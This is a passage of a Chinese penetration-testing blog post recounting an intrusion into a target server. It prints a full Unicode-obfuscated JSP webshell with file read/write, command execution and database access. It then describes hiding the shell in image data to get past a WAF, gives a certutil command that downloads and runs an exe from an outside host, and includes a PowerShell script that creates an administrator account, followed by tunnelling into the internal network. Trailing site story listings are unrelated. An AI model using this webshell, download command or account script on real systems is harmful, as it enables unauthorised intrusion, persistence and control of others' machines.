u0072\u003d\u006d\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0051\u0075\u0065\u0072\u0079\u0028\u0022\u0073\u0065\u006c\u0065\u0063\u0074\u0020\u002a\u0020\u0066\u0072\u006f\u006d\u0020\u0022\u002b\u0078\u005b\u0033\u005d\u0029\u003b\u0052\u0065\u0073\u0075\u006c\u0074\u0053\u0065\u0074\u004d\u0065\u0074\u0061\u0044\u0061\u0074\u0061\u0020\u0064\u003d\u0072\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0061\u0044\u0061\u0074\u0061\u0028\u0029\u003b\u0066\u006f\u0072\u0028\u0069\u006e\u0074\u0020\u0069\u003d\u0031\u003b\u0069\u003c\u003d\u0064\u002e\u0067\u0065\u0074\u0043\u006f\u006c\u0075\u006d\u006e\u0043\u006f\u0075\u006e\u0074\u0028\u0029\u003b\u0069\u002b\u002b\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0064\u002e\u0067\u0065\u0074\u0043\u006f\u006c\u0075\u006d\u006e\u004e\u0061\u006d\u0065\u0028\u0069\u0029\u002b\u0022\u0020\u0028\u0022\u002b\u0064\u002e\u0067\u0065\u0074\u0043\u006f\u006c\u0075\u006d\u006e\u0054\u0079\u0070\u0065\u004e\u0061\u006d\u0065\u0028\u0069\u0029\u002b\u0022\u0029\u005c\u0074\u0022\u0029\u003b\u007d\u0072\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u006d\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u0063\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u0051\u0051\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0071\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u0073\u0062\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0069\u006e\u0074\u0020\u0069\u003b\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0020\u0063\u003d\u0047\u0043\u0028\u0073\u0029\u003b\u0053\u0074\u0061\u0074\u0065\u006d\u0065\u006e\u0074\u0020\u006d\u003d\u0063\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0053\u0074\u0061\u0074\u0065\u006d\u0065\u006e\u0074\u0028\u0031\u0030\u0030\u0035\u002c\u0031\u0030\u0030\u0038\u0029\u003b\u0074\u0072\u0079\u007b\u0052\u0065\u0073\u0075\u006c\u0074\u0053\u0065\u0074\u0020\u0072\u003d\u006d\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0051\u0075\u0065\u0072\u0079\u0028\u0071\u0029\u003b\u0052\u0065\u0073\u0075\u006c\u0074\u0053\u0065\u0074\u004d\u0065\u0074\u0061\u0044\u0061\u0074\u0061\u0020\u0064\u003d\u0072\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0061\u0044\u0061\u0074\u0061\u0028\u0029\u003b\u0069\u006e\u0074\u0020\u006e\u003d\u0064\u002e\u0067\u0065\u0074\u0043\u006f\u006c\u0075\u006d\u006e\u0043\u006f\u0075\u006e\u0074\u0028\u0029\u003b\u0066\u006f\u0072\u0028\u0069\u003d\u0031\u003b\u0069\u003c\u003d\u006e\u003b\u0069\u002b\u002b\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0064\u002e\u0067\u0065\u0074\u0043\u006f\u006c\u0075\u006d\u006e\u004e\u0061\u006d\u0065\u0028\u0069\u0029\u002b\u0022\u005c\u0074\u007c\u005c\u0074\u0022\u0029\u003b\u007d\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0072\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u0029\u007b\u0066\u006f\u0072\u0028\u0069\u003d\u0031\u003b\u0069\u003c\u003d\u006e\u003b\u0069\u002b\u002b\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0045\u0043\u0028\u0072\u002e\u0067\u0065\u0074\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0069\u0029\u002c\u0063\u0073\u0029\u002b\u0022\u005c\u0074\u007c\u005c\u0074\u0022\u0029\u003b\u007d\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u007d\u0072\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0052\u0065\u0073\u0075\u006c\u0074\u005c\u0074\u007c\u005c\u0074\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u0074\u0072\u0079\u007b\u006d\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0055\u0070\u0064\u0061\u0074\u0065\u0028\u0071\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u0020\u0053\u0075\u0063\u0063\u0065\u0073\u0073\u0066\u0075\u006c\u006c\u0079\u0021\u005c\u0074\u007c\u005c\u0074\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0065\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0065\u0065\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u002b\u0022\u005c\u0074\u007c\u005c\u0074\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u007d\u007d\u006d\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u0063\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d
%>
<%
\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u007a\u0030\u0022\u0029\u002b\u0022\u0022\u003b\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0073\u0065\u0074\u0043\u0068\u0061\u0072\u0061\u0063\u0074\u0065\u0072\u0045\u006e\u0063\u006f\u0064\u0069\u006e\u0067\u0028\u0063\u0073\u0029\u003b\u0072\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u002e\u0073\u0065\u0074\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u0054\u0079\u0070\u0065\u0028\u0022\u0074\u0065\u0078\u0074\u002f\u0068\u0074\u006d\u006c\u003b\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u003d\u0022\u002b\u0063\u0073\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u005a\u003d\u0045\u0043\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0050\u0077\u0064\u0029\u002b\u0022\u0022\u002c\u0063\u0073\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u007a\u0031\u003d\u0045\u0043\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u007a\u0031\u0022\u0029\u002b\u0022\u0022\u002c\u0063\u0073\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u007a\u0032\u003d\u0045\u0043\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u007a\u0032\u0022\u0029\u002b\u0022\u0022\u002c\u0063\u0073\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u0073\u0062\u003d\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0028\u0022\u0022\u0029\u003b\u0074\u0072\u0079\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0058\u0040\u0059\u0022\u0029\u003b\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0041\u0022\u0029\u0029\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0067\u0065\u0074\u0052\u0065\u0061\u006c\u0050\u0061\u0074\u0068\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0055\u0052\u0049\u0028\u0029\u0029\u0029\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0065\u006e\u0074\u0028\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0073\u002b\u0022\u005c\u0074\u0022\u0029\u003b\u0069\u0066\u0028\u0021\u0073\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u0031\u0029\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u002f\u0022\u0029\u0029\u007b\u0041\u0041\u0028\u0073\u0062\u0029\u003b\u007d\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0042\u0022\u0029\u0029\u007b\u0042\u0042\u0028\u007a\u0031\u002c\u0073\u0062\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0043\u0022\u0029\u0029\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u006c\u003d\u0022\u0022\u003b\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0020\u0062\u0072\u003d\u006e\u0065\u0077\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u006e\u0065\u0077\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u007a\u0031\u0029\u0029\u0029\u0029\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u006c\u003d\u0062\u0072\u002e\u0072\u0065\u0061\u0064\u004c\u0069\u006e\u0065\u0028\u0029\u0029\u0021\u003d\u006e\u0075\u006c\u006c\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u006c\u002b\u0022\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u007d\u0062\u0072\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0044\u0022\u0029\u0029\u007b\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0057\u0072\u0069\u0074\u0065\u0072\u0020\u0062\u0077\u003d\u006e\u0065\u0077\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0057\u0072\u0069\u0074\u0065\u0072\u0028\u006e\u0065\u0077\u0020\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0057\u0072\u0069\u0074\u0065\u0072\u0028\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u007a\u0031\u0029\u0029\u0029\u0029\u003b\u0062\u0077\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u007a\u0032\u0029\u003b\u0062\u0077\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0031\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0045\u0022\u0029\u0029\u007b\u0045\u0045\u0028\u007a\u0031\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0031\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0046\u0022\u0029\u0029\u007b\u0046\u0046\u0028\u007a\u0031\u002c\u0072\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0047\u0022\u0029\u0029\u007b\u0047\u0047\u0028\u007a\u0031\u002c\u007a\u0032\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0031\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0048\u0022\u0029\u0029\u007b\u0048\u0048\u0028\u007a\u0031\u002c\u007a\u0032\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0031\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0049\u0022\u0029\u0029\u007b\u0049\u0049\u0028\u007a\u0031\u002c\u007a\u0032\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0031\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u004a\u0022\u0029\u0029\u007b\u004a\u004a\u0028\u007a\u0031\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0031\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u004b\u0022\u0029\u0029\u007b\u004b\u004b\u0028\u007a\u0031\u002c\u007a\u0032\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0031\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u004c\u0022\u0029\u0029\u007b\u004c\u004c\u0028\u007a\u0031\u002c\u007a\u0032\u0029\u003b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0031\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u004d\u0022\u0029\u0029\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u003d\u007b\u007a\u0031\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0032\u0029\u002c\u007a\u0031\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u0032\u0029\u002c\u007a\u0032\u007d\u003b\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0020\u0070\u003d\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0063\u0029\u003b\u004d\u004d\u0028\u0070\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0073\u0062\u0029\u003b\u004d\u004d\u0028\u0070\u002e\u0067\u0065\u0074\u0045\u0072\u0072\u006f\u0072\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0073\u0062\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u004e\u0022\u0029\u0029\u007b\u004e\u004e\u0028\u007a\u0031\u002c\u0073\u0062\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u004f\u0022\u0029\u0029\u007b\u004f\u004f\u0028\u007a\u0031\u002c\u0073\u0062\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0050\u0022\u0029\u0029\u007b\u0050\u0050\u0028\u007a\u0031\u002c\u0073\u0062\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u005a\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0051\u0022\u0029\u0029\u007b\u0051\u0051\u0028\u0063\u0073\u002c\u007a\u0031\u002c\u007a\u0032\u002c\u0073\u0062\u0029\u003b\u007d\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0045\u0052\u0052\u004f\u0052\u0022\u002b\u0022\u003a\u002f\u002f\u0020\u0022\u002b\u0065\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u0029\u003b\u007d\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0058\u0040\u0059\u0022\u0029\u003b\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0073\u0062\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u0029\u003b
%>

可以上传成功。

使用caidao-20160622的版本进行连接（默认分隔符: X@Y）。
然而。

看来内容校验过了，但是菜刀流量被waf拦截了。
这时想到了2种方案。

1、找一个内容加密的大马，例如php的大马的加解密过程

2、菜刀马流量中转
上传中转菜刀马，配合本地加解密脚本文件，对数据进行中转加密传输。

奈何网上关于jsp加密以及中转木马研究的文章数量有限，再加上本人不懂java开发，内容加密这条路暂时走不通了。
倒是看到了不少大佬优秀的文章，学习到了很多相关知识。如：
菜刀HTTP流量中转代理过WAF
CaidaoMitmProxy：基于HTTP代理中转菜刀过WAF

内容混淆

加密既然暂时走不通，只能换一个思路，尝试对文件内容进行混淆，绕过waf。
首先想到的是图片马，尝试把木马隐藏到图片源码中，绕过waf。
在这个过程中也踩了一些坑，有些图片源码包含特殊字符会和木马的源代码发生冲突，因此需要特殊处理过的图片才能保证正常解析。
推荐使用如下图片。

使用notepad++打开图片，把jsp马插入到图片源码中。

更改为jsp后缀进行上传。

上传失败，猜测长度不够，未起到混淆的目的，复制图片的一段源码，反复的复制到木马文件的前后位置，经过若干次尝试，返回了上传成功。

访问webshell地址，解析成功，成功拿下了目标的webshell。

使用证书下载命令下载免杀exe到本地执行。

certutil.exe -urlcache -split -f http://x.x.x.x/1.exe D:/1.exe
D:/1.exe

免杀处理使用传送门中的AVIator。
cs成功接收到会话。

尝试激活guest用户，加入管理员组失败。

存在服务器防护需要绕过。
服务器为server 2008，默认情况下，可以使用Procdump+Mimikatz来读取管理员的明文密码。

具体实现可参考之前发布的文章。传输门

假设对方打了补丁，无法获取明文密码的情况下，可以选择powershell添加用户。
使用Get-ExecutionPolicy 查看当前执行策略为Restricted（默认策略，不允许任意脚本的执行）
使用Set-ExecutionPolicy 设置执行的策略为RemoteSigned （本地脚本无限制，但是对来自网络的脚本必须经过签名）
相关powershell命令可查看CSeroad大佬的文章。传送门

powershell的免杀性较强，大多数情况下都可以执行成功。
上传ps1文件到服务器中，调用powershell执行。

$computer=Get-WMIObject  Win32_ComputerSystem
$computername = $computer.name
$username = 'admin'
$password = '1234qwer..' 
$desc = 'Local admin account'
$computer = [ADSI]"WinNT://$computername,computer"
$user = $computer.Create("user", $username)
$user.SetPassword($password)
$user.Setinfo()
$user.description = $desc
$user.setinfo()
$user.UserFlags = 65536
$user.SetInfo()
$group = [ADSI]("WinNT://$computername/administrators,group")
$group.add("WinNT://$username,user")

使用cs搭建socks4隧道。

配置Proxifer。

成功把本机主机带入目标内网，连接远程桌面。
到此渗透结束。

总结

由于不懂java开发，导致前期的getshell耽误了过长时间。
渗透过程中走了很多弯路，但也学习到了很多新的知识。

最后编辑于：2020.01.15 10:17:29

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 159,015评论 4赞 362
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 67,262评论 1赞 292
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 108,727评论 0赞 243
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 43,986评论 0赞 205
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 52,363评论 3赞 287
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 40,610评论 1赞 219
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 31,871评论 2赞 312
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 30,582评论 0赞 198
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 34,297评论 1赞 242
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 30,551评论 2赞 246
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 32,053评论 1赞 260
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 28,385评论 2赞 253
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 33,035评论 3赞 236
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 26,079评论 0赞 8
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 26,841评论 0赞 195
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 35,648评论 2赞 274
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 35,550评论 2赞 270